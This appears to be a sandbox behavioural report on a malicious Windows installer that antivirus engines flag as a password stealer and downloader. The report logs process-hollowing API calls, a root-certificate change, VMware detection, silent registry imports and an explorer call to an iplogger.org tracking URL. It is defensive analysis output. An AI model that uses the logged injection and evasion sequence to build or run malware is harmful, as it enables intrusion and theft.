RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1808 called NtSetContextThread to modify thread in remote process 2776
Process injection	Process 1408 called NtSetContextThread to modify thread in remote process 3312
NtSetContextThread June 19, 2021, 6:41 p.m.	registers.eip: 2000355780 registers.esp: 2620140 registers.edi: 0 registers.eax: 4292034 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000230 process_identifier: 2776	1	0	0
NtSetContextThread June 19, 2021, 6:42 p.m.	registers.eip: 2000355780 registers.esp: 4193748 registers.edi: 0 registers.eax: 4292030 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002a0 process_identifier: 3312	1	0	0

Deletes a large number of files from the system indicative of ransomware, wiper malware or system destruction (50 out of 107 events)

file	C:\Users\test22\AppData\Local\Temp\$inst\0.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\temp_0.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\20.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\5.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\15.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\7.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\8.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\13.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\17.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\10.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\21.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\3.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\16.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\9.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\2.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\50.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\1.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\4.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\51.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\11.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\12.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\6.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\14.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF7DD.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF7DC.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF7A7.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF942.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF8E9.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF7F1.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF84A.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF8EA.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF7A8.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF84B.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF801.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF91E.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF7BA.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF943.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF7CA.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF90C.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF7EE.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF836.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF930.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF920.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF839.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF7EF.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF955.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF7CB.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF90D.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF814.tmp
file	C:\Users\test22\AppData\Local\Temp\tmpF824.tmp

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1808 resumed a thread in remote process 2776
Process injection	Process 1408 resumed a thread in remote process 3312
NtResumeThread June 19, 2021, 6:41 p.m.	thread_handle: 0x00000230 suspend_count: 1 process_identifier: 2776	1	0	0
NtResumeThread June 19, 2021, 6:42 p.m.	thread_handle: 0x000002a0 suspend_count: 1 process_identifier: 3312	1	0	0

Created a process named as a common system process (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW June 19, 2021, 6:42 p.m.	thread_identifier: 2552 thread_handle: 0x00000088 process_identifier: 1068 current_directory: C:\Program Files (x86)\EverestSoftrade\TonerRecover filepath: C:\Windows\System32\explorer.exe track: 1 command_line: explorer https://iplogger.org/2qJhq6 filepath_r: C:\Windows\system32\explorer.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1	0

Tries to unhook Windows functions monitored by Cuckoo (1 event)

Time & API	Arguments	Status	Return	Repeated
__anomaly__ June 19, 2021, 6:42 p.m.	tid: 1160 message: Encountered 65537 exceptions, quitting. subcategory: exception function_name:	1	0	0

Detects VMWare through the presence of a registry key (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.

Executed a process and injected code into it, probably while unpacking (50 out of 63 events)

Time & API	Arguments	Status	Return
NtResumeThread June 19, 2021, 6:41 p.m.	thread_handle: 0x000001f8 suspend_count: 1 process_identifier: 1896	1	0
CreateProcessInternalW June 19, 2021, 6:41 p.m.	thread_identifier: 1160 thread_handle: 0x00000290 process_identifier: 1756 current_directory: C:\Program Files (x86)\VR\Versium Research\ filepath: C:\Program Files (x86)\VR\Versium Research\RunWW.exe track: 1 command_line: "C:\Program Files (x86)\VR\Versium Research\RunWW.exe" filepath_r: C:\Program Files (x86)\VR\Versium Research\RunWW.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000298	1	1
CreateProcessInternalW June 19, 2021, 6:41 p.m.	thread_identifier: 2772 thread_handle: 0x000002a0 process_identifier: 1808 current_directory: C:\Program Files (x86)\VR\Versium Research\ filepath: C:\Program Files (x86)\VR\Versium Research\BSKbrowser.exe track: 1 command_line: "C:\Program Files (x86)\VR\Versium Research\BSKbrowser.exe" filepath_r: C:\Program Files (x86)\VR\Versium Research\BSKbrowser.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002d4	1	1
CreateProcessInternalW June 19, 2021, 6:41 p.m.	thread_identifier: 1572 thread_handle: 0x00000298 process_identifier: 888 current_directory: C:\Program Files (x86)\VR\Versium Research\ filepath: C:\Program Files (x86)\VR\Versium Research\Versium.exe track: 1 command_line: "C:\Program Files (x86)\VR\Versium Research\Versium.exe" filepath_r: C:\Program Files (x86)\VR\Versium Research\Versium.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002e0	1	1
NtResumeThread June 19, 2021, 6:41 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 1808	1	0
NtResumeThread June 19, 2021, 6:41 p.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 1808	1	0
NtResumeThread June 19, 2021, 6:41 p.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 1808	1	0
CreateProcessInternalW June 19, 2021, 6:41 p.m.	thread_identifier: 732 thread_handle: 0x00000230 process_identifier: 2776 current_directory: filepath: track: 1 command_line: C:\Program Files (x86)\VR\Versium Research\BSKbrowser.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x00000234	1	1
NtUnmapViewOfSection June 19, 2021, 6:41 p.m.	base_address: 0x00400000 region_size: 10682368 process_identifier: 2776 process_handle: 0x00000234		3221225497
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 2776 region_size: 122880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000234	1	0
WriteProcessMemory June 19, 2021, 6:41 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELð,êà0lÂ} @ àm@p}O Ü\|pÀT} H.textxk l `.rsrcÜ p@@.relocÀx@B base_address: 0x00400000 process_identifier: 2776 process_handle: 0x00000234	1	1
WriteProcessMemory June 19, 2021, 6:41 p.m.	buffer: base_address: 0x00402000 process_identifier: 2776 process_handle: 0x00000234	1	1
WriteProcessMemory June 19, 2021, 6:41 p.m.	buffer: P8hÜ LL4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°¬StringFileInfo000004b0,FileDescription 0FileVersion0.0.0.0<InternalNameSauciness.exe(LegalCopyright DOriginalFilenameSauciness.exe4ProductVersion0.0.0.08Assembly Version0.0.0.0ì¢êï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0041a000 process_identifier: 2776 process_handle: 0x00000234	1	1
WriteProcessMemory June 19, 2021, 6:41 p.m.	buffer: pÄ= base_address: 0x0041c000 process_identifier: 2776 process_handle: 0x00000234	1	1
NtGetContextThread June 19, 2021, 6:41 p.m.	thread_handle: 0x00000230	1	0
WriteProcessMemory June 19, 2021, 6:41 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2776 process_handle: 0x00000234	1	1
NtSetContextThread June 19, 2021, 6:41 p.m.	registers.eip: 2000355780 registers.esp: 2620140 registers.edi: 0 registers.eax: 4292034 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000230 process_identifier: 2776	1	0
NtResumeThread June 19, 2021, 6:41 p.m.	thread_handle: 0x00000230 suspend_count: 1 process_identifier: 2776	1	0
CreateProcessInternalW June 19, 2021, 6:41 p.m.	thread_identifier: 2196 thread_handle: 0x000000d0 process_identifier: 1912 current_directory: filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\is-KD3C2.tmp\Versium.tmp" /SL5="$F0240,138429,56832,C:\Program Files (x86)\VR\Versium Research\Versium.exe" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x000000d4	1	1
NtResumeThread June 19, 2021, 6:41 p.m.	thread_handle: 0x00000148 suspend_count: 1 process_identifier: 1912	1	0
NtResumeThread June 19, 2021, 6:41 p.m.	thread_handle: 0x0000057c suspend_count: 1 process_identifier: 1912	1	0
NtResumeThread June 19, 2021, 6:41 p.m.	thread_handle: 0x00000590 suspend_count: 1 process_identifier: 1912	1	0
CreateProcessInternalW June 19, 2021, 6:42 p.m.	thread_identifier: 2680 thread_handle: 0x00000678 process_identifier: 2216 current_directory: C:\Users\test22\AppData\Local\Temp\is-FEBQS.tmp\ filepath: C:\Users\test22\AppData\Local\Temp\is-FEBQS.tmp\Setup.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\is-FEBQS.tmp\Setup.exe" /Verysilent filepath_r: C:\Users\test22\AppData\Local\Temp\is-FEBQS.tmp\Setup.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000067c	1	1
NtResumeThread June 19, 2021, 6:42 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2776	1	0
NtResumeThread June 19, 2021, 6:42 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2776	1	0
NtResumeThread June 19, 2021, 6:42 p.m.	thread_handle: 0x000001c8 suspend_count: 1 process_identifier: 2776	1	0
NtResumeThread June 19, 2021, 6:42 p.m.	thread_handle: 0x00000358 suspend_count: 1 process_identifier: 2776	1	0
NtResumeThread June 19, 2021, 6:42 p.m.	thread_handle: 0x0000021c suspend_count: 1 process_identifier: 2776	1	0
NtResumeThread June 19, 2021, 6:42 p.m.	thread_handle: 0x00000638 suspend_count: 1 process_identifier: 2776	1	0
NtResumeThread June 19, 2021, 6:42 p.m.	thread_handle: 0x000001f4 suspend_count: 1 process_identifier: 2216	1	0
CreateProcessInternalW June 19, 2021, 6:42 p.m.	thread_identifier: 812 thread_handle: 0x00000274 process_identifier: 2852 current_directory: C:\Program Files (x86)\EverestSoftrade\TonerRecover\ filepath: track: 1 command_line: "C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" filepath_r: stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000268	1	1
CreateProcessInternalW June 19, 2021, 6:42 p.m.	thread_identifier: 1180 thread_handle: 0x00000274 process_identifier: 1408 current_directory: C:\Program Files (x86)\EverestSoftrade\TonerRecover\ filepath: C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe track: 1 command_line: "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe" filepath_r: C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000027c	1	1
CreateProcessInternalW June 19, 2021, 6:42 p.m.	thread_identifier: 2880 thread_handle: 0x00000268 process_identifier: 872 current_directory: C:\Program Files (x86)\EverestSoftrade\TonerRecover\ filepath: C:\Program Files (x86)\EverestSoftrade\TonerRecover\Toner-Recover.exe track: 1 command_line: "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Toner-Recover.exe" filepath_r: C:\Program Files (x86)\EverestSoftrade\TonerRecover\Toner-Recover.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000280	1	1
CreateProcessInternalW June 19, 2021, 6:42 p.m.	thread_identifier: 2552 thread_handle: 0x00000088 process_identifier: 1068 current_directory: C:\Program Files (x86)\EverestSoftrade\TonerRecover filepath: C:\Windows\System32\explorer.exe track: 1 command_line: explorer https://iplogger.org/2qJhq6 filepath_r: C:\Windows\system32\explorer.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW June 19, 2021, 6:42 p.m.	thread_identifier: 2020 thread_handle: 0x00000084 process_identifier: 2740 current_directory: C:\Program Files (x86)\EverestSoftrade\TonerRecover filepath: C:\Windows\System32\regedit.exe track: 1 command_line: regedit /s adj.reg filepath_r: C:\Windows\system32\regedit.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW June 19, 2021, 6:42 p.m.	thread_identifier: 3092 thread_handle: 0x00000088 process_identifier: 3088 current_directory: C:\Program Files (x86)\EverestSoftrade\TonerRecover filepath: C:\Windows\System32\regedit.exe track: 1 command_line: regedit /s adj2.reg filepath_r: C:\Windows\system32\regedit.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
NtResumeThread June 19, 2021, 6:42 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 1408	1	0
NtResumeThread June 19, 2021, 6:42 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 1408	1	0
NtResumeThread June 19, 2021, 6:42 p.m.	thread_handle: 0x000001bc suspend_count: 1 process_identifier: 1408	1	0
CreateProcessInternalW June 19, 2021, 6:42 p.m.	thread_identifier: 3268 thread_handle: 0x00000260 process_identifier: 3264 current_directory: C:\Program Files (x86)\EverestSoftrade\TonerRecover filepath: track: 1 command_line: C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x00000264	1	1
NtUnmapViewOfSection June 19, 2021, 6:42 p.m.	base_address: 0x00400000 region_size: 643072 process_identifier: 3264 process_handle: 0x00000264		3221225497
NtAllocateVirtualMemory June 19, 2021, 6:42 p.m.	process_identifier: 3264 region_size: 122880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000264		3221225496
CreateProcessInternalW June 19, 2021, 6:42 p.m.	thread_identifier: 3316 thread_handle: 0x000002a0 process_identifier: 3312 current_directory: C:\Program Files (x86)\EverestSoftrade\TonerRecover filepath: track: 1 command_line: C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x000002a4	1	1
NtUnmapViewOfSection June 19, 2021, 6:42 p.m.	base_address: 0x00400000 region_size: 1994129408 process_identifier: 3312 process_handle: 0x000002a4		3221225497
NtAllocateVirtualMemory June 19, 2021, 6:42 p.m.	process_identifier: 3312 region_size: 122880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002a4	1	0
NtGetContextThread June 19, 2021, 6:42 p.m.	thread_handle: 0x000002a0	1	0
NtSetContextThread June 19, 2021, 6:42 p.m.	registers.eip: 2000355780 registers.esp: 4193748 registers.edi: 0 registers.eax: 4292030 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002a0 process_identifier: 3312	1	0
NtResumeThread June 19, 2021, 6:42 p.m.	thread_handle: 0x000002a0 suspend_count: 1 process_identifier: 3312	1	0
NtResumeThread June 19, 2021, 6:42 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 872	1	0
NtResumeThread June 19, 2021, 6:42 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 872	1	0

File has been identified by 36 AntiVirus engines on VirusTotal as malicious (36 events)

Bkav	W32.AIDetect.malware2
MicroWorld-eScan	Trojan.GenericKD.46340695
FireEye	Generic.mg.5499fd2b9a83a2de
CAT-QuickHeal	Trojan.Chapak
ALYac	Trojan.GenericKD.46340695
Cylance	Unsafe
K7AntiVirus	Trojan ( 0057dfe91 )
K7GW	Trojan ( 0057dfe91 )
Cybereason	malicious.b9a83a
BitDefenderTheta	Gen:NN.ZexaF.34744.OuW@aWwEx0nG
Cyren	W32/Kryptik.EHT.gen!Eldorado
ESET-NOD32	multiple detections
Avast	Win32:PWSX-gen [Trj]
ClamAV	Win.Malware.Generic-9849070-0
Kaspersky	HEUR:Trojan.Win32.Chapak.gen
BitDefender	Trojan.GenericKD.46340695
NANO-Antivirus	Trojan.Win32.Chapak.iwixdy
Paloalto	generic.ml
APEX	Malicious
Ad-Aware	Trojan.GenericKD.46340695
Sophos	Generic ML PUA (PUA)
DrWeb	Trojan.PWS.Siggen3.109
Emsisoft	Trojan.GenericKD.46340695 (B)
Ikarus	Trojan-Downloader.Win32.Adload
MaxSecure	Trojan-Ransom.Win32.Crypmod.zfq
Avira	TR/AD.VidarStealer.hanva
Microsoft	Program:Win32/Wacapew.C!ml
GData	Trojan.GenericKD.46340695
Cynet	Malicious (score: 99)
AhnLab-V3	Trojan/Win.Generic.C4477062
MAX	malware (ai score=83)
VBA32	BScope.Trojan.Sabsik.FL
Malwarebytes	Malware.AI.2628208216
SentinelOne	Static AI - Suspicious PE
eGambit	Unsafe.AI_Score_99%
AVG	Win32:PWSX-gen [Trj]

Setup.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All